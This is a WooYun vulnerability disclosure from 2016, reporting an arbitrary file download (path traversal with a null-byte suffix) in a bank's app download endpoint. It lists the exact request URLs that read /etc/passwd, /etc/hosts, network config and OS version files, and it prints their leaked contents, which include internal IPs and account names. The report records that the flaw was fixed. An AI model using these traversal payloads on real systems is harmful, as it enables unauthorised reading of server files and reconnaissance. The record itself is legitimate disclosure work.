乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-20: 细节已通知厂商并且等待厂商处理中 2016-03-22: 厂商已经确认,细节仅向厂商公开 2016-04-01: 细节向核心白帽子及相关领域专家公开 2016-04-11: 细节向普通白帽子公开 2016-04-21: 细节向实习白帽子公开 2016-05-06: 细节向公众公开
任意文件下载
网卡配置信息
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.0apk
DEVICE=eth0TYPE=EthernetONBOOT=yesNM_CONTROLLED=noBOOTPROTO=noneIPADDR=10.2.12.33GATEWAY=10.2.12.254NETMASK=255.255.255.0DNS1=10.0.19.1DNS2=10.0.19.2
系统版本信息
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/issue%00.0apk
CentOS release 6.6 (Final)Kernel \r on an \m
hosts 文件
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/hosts%00.0apk
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4::1 localhost localhost.localdomain localhost6 localhost6.localdomain610.2.12.33 localhost192.168.152.45 msg.cmbchinaucs.com10.2.12.33 APP1233
这个 不用说了吧
https://e.grcbank.com//dl/app/download.do?fn=../../../../../../../../../../etc/passwd%00.0apk
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/bin/falsesync:x:5:0:sync:/sbin:/bin/falseshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/bin/falsemail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/bin/falseoperator:x:11:0:operator:/root:/bin/falsegames:x:12:100:games:/usr/games:/bin/falsegopher:x:13:30:gopher:/var/gopher:/bin/falseftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/bin/falsedbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsaslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinucsmy:x:500:500::/home/ucsmy:/bin/bashnginx:x:501:501::/usr/local/nginx:/sbin/nologinmysql:x:306:306::/home/mysql:/bin/bashnagios:x:502:502::/usr/local/nagios:/bin/bashwebadmin:x:503:503::/usr/local/webadmin:/bin/bashzabbix:x:522:522::/home/zabbix:/bin/bashsplunk:x:523:524::/home/splunk:/bin/bashrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinro_l_deid01:x:525:526::/home/ro_l_deid01:/bin/bashro_l_deid02:x:526:527::/home/ro_l_deid02:/bin/bashro_l_deid03:x:527:528::/home/ro_l_deid03:/bin/bashro_l_deid04:x:528:529::/home/ro_l_deid04:/bin/bashro_l_deid05:x:529:530::/home/ro_l_deid05:/bin/bash
你懂得
危害等级:中
漏洞Rank:6
确认时间:2016-03-22 09:49
联系相关网站的厂商进行修复。
2016-03-24:已修复。